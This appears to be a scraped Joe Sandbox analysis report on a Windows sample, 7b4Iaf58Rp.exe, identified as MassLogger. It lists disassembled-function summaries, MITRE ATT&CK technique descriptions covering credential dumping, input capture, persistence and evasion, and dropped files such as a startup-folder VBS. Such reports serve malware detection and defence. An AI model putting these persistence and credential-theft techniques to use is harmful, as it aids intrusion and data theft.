Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 8f028b7440d0331e118a3d16621024b7fff00abb26ef8f0cdd4d794f2af58fa8
Instruction ID: 13e91110f6ad49eaf1d0b1fa0c919bbfd5da0f5a0264eb8a2b960dbbb135a927
Opcode Fuzzy Hash: 8f028b7440d0331e118a3d16621024b7fff00abb26ef8f0cdd4d794f2af58fa8
Instruction Fuzzy Hash: DE11A575500209ABEB22AFA4CC86FBEB774FF44320F10455BE9959B2C1DB7ABC148791

Function 00FE8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FE8E73

Strings

ComboBox, xrefs: 00FE8E12
ListBox, xrefs: 00FE8E3D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3c4abda596341517f09f831e1ce33bcd5e1da7b7b6671da01a6aa3d3d20c9b81
Instruction ID: e5aa22a40a72d481aa6674ca8f101dbc17c43d341dd4add8bc692ac896ed24b7
Opcode Fuzzy Hash: 3c4abda596341517f09f831e1ce33bcd5e1da7b7b6671da01a6aa3d3d20c9b81
Instruction Fuzzy Hash: C501F1B1A41319ABAF15FBE1CC419FE7368AF05360B040A19F865A72E1DE39580CE750

Function 00FE8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00FE8D6B

Strings

ComboBox, xrefs: 00FE8D0A
ListBox, xrefs: 00FE8D35

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8b82aec12a36f3c7274320d21a612fd8b1f283080da071639c38bf58b5638ee2
Instruction ID: 0cb9375289bdeab4be84ae3a7af5a6c73c1ee395011fa3ad4bd9b98ee58bfb88
Opcode Fuzzy Hash: 8b82aec12a36f3c7274320d21a612fd8b1f283080da071639c38bf58b5638ee2
Instruction Fuzzy Hash: 9901D4B1A41209ABEF25FBA1CD52AFE73A89F15750F100029B805672A1DE195E0CE671

Function 00FE8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00FE8DEE

Strings

ComboBox, xrefs: 00FE8D8F
ListBox, xrefs: 00FE8DBA

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 773b834538d1263a6815b4213d6bf189afb7ee1aad218d735fb6ceaf303ffed0
Instruction ID: 45ef9ec7cdd10bc7a1366b49fa56252b25f1a5c5c6a7586422d45a75bead40fa
Opcode Fuzzy Hash: 773b834538d1263a6815b4213d6bf189afb7ee1aad218d735fb6ceaf303ffed0
Instruction Fuzzy Hash: E401F7B1A41209A7EF21FAA5CD42BFE73A88F15750F100029B845A3291DE195E0DF671

Function 00FF4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FF4F46
_wcscmp.LIBCMT ref: 00FF4F58

Strings

#32770, xrefs: 00FF4F52

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 044e78bb59c175d4fb218399005f063a8b0ee1f1bf26f83e0443eff35d5ca2a6
Instruction ID: 3142c722a242fbb37c0397cf5b0fb61ea66c5388666ee42b7b772ddf95db3fb0
Opcode Fuzzy Hash: 044e78bb59c175d4fb218399005f063a8b0ee1f1bf26f83e0443eff35d5ca2a6
Instruction Fuzzy Hash: 6CE09232A002292BD7209A9AAC49BA7F7ACEB45B70F01016BFD44D7045D565AA45CBE0

Function 00FCB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB314: _memset.LIBCMT ref: 00FCB321

Part of subcall function 00FB0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FCB2F0,?,?,?,00F9100A), ref: 00FB0945

IsDebuggerPresent.KERNEL32(?,?,?,00F9100A), ref: 00FCB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F9100A), ref: 00FCB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FCB2FE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 7c2299708b082d6764795736294ba9eec96be3b6a3db2f69e97e24077abf5f43
Instruction ID: 7af8118772f71ba3bce036a6f540517faaf587f2e1455203401bad482bf54b47
Opcode Fuzzy Hash: 7c2299708b082d6764795736294ba9eec96be3b6a3db2f69e97e24077abf5f43
Instruction Fuzzy Hash: 73E06D742003428FE730DF29E5067467AE8AF00314F00892CE486C7241EBBDE408DBA1

Function 00FE7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FE7C82

Part of subcall function 00FB3358: _doexit.LIBCMT ref: 00FB3362

Strings

AutoIt, xrefs: 00FE7C76
Error allocating memory., xrefs: 00FE7C7B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 3282cacc4b017811a2155c4b99ba48ee14849c934ec0f7f829dc3bcffd2778c6
Instruction ID: 7255f256761e50d11e0f86dfa1dbbcc30f630a97a1fa3305f500eb35df6d580c
Opcode Fuzzy Hash: 3282cacc4b017811a2155c4b99ba48ee14849c934ec0f7f829dc3bcffd2778c6
Instruction Fuzzy Hash: B9D0C2323C431836D12031AAAC06FCA35884B05B52F140425FB449909349DA948062E4

Function 00FD1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00FD1775

Part of subcall function 0100BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FD195E,?), ref: 0100BFFE
Part of subcall function 0100BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FD196D

Strings

WIN_XPe, xrefs: 00FD1788

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 1672b48fd30865e13b62c866383ad0dcc2a2d6a406f18cc35280456dafc7b3f0
Instruction ID: e9d9d224036889fdc29cad34ef1cc82806cad79b521a6dff7e20fc3ccf03912d
Opcode Fuzzy Hash: 1672b48fd30865e13b62c866383ad0dcc2a2d6a406f18cc35280456dafc7b3f0
Instruction Fuzzy Hash: 62F06D7180410AEFDB25DB90C594BECBBF9BB08300F580086E042A31A0CB7A4F88EF60

Function 01015964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0101596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01015981

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Strings

Shell_TrayWnd, xrefs: 01015967

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 05baa41c2092d74f11b168dfa6cdc779c8f025aa8e1deacd7ec248b1e8aae541
Instruction ID: 78a4ae72ff84476fde895bd35578c044fec0cbdb6b77d6fbfc897f68edc42eaa
Opcode Fuzzy Hash: 05baa41c2092d74f11b168dfa6cdc779c8f025aa8e1deacd7ec248b1e8aae541
Instruction Fuzzy Hash: 7DD0C931784712BBE674AA709C4FFA67A14BF04B50F000829B389AA1D9C9E99804C794

Function 01015998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010159AE
PostMessageW.USER32(00000000), ref: 010159B5

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Strings

Shell_TrayWnd, xrefs: 010159A7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 21f71740872772cdc66f095d0c8c0de996c8ab20affc624e766671280b166444
Instruction ID: afe8aa733cb05f2890243b4b337e400252e93fb39459261b709b332f5690bd9c
Opcode Fuzzy Hash: 21f71740872772cdc66f095d0c8c0de996c8ab20affc624e766671280b166444
Instruction Fuzzy Hash: E1D0C9317807127BE674AA709C4FF967614BB04B50F000829B389AA1D9C9E9A804C794

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7b4Iaf58Rp.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut4F2F.tmp

C:\Users\user\AppData\Local\Temp\aut5E33.tmp

C:\Users\user\AppData\Local\Temp\aut6E21.tmp

C:\Users\user\AppData\Local\Temp\aut7C3A.tmp

C:\Users\user\AppData\Local\Temp\aut97E0.tmp

C:\Users\user\AppData\Local\Temp\disturb

C:\Users\user\AppData\Local\scrolar\neophobia.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Static File Info

General

File Icon

Windows Analysis Report
7b4Iaf58Rp.exe

Function 00F93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00F949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00F94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
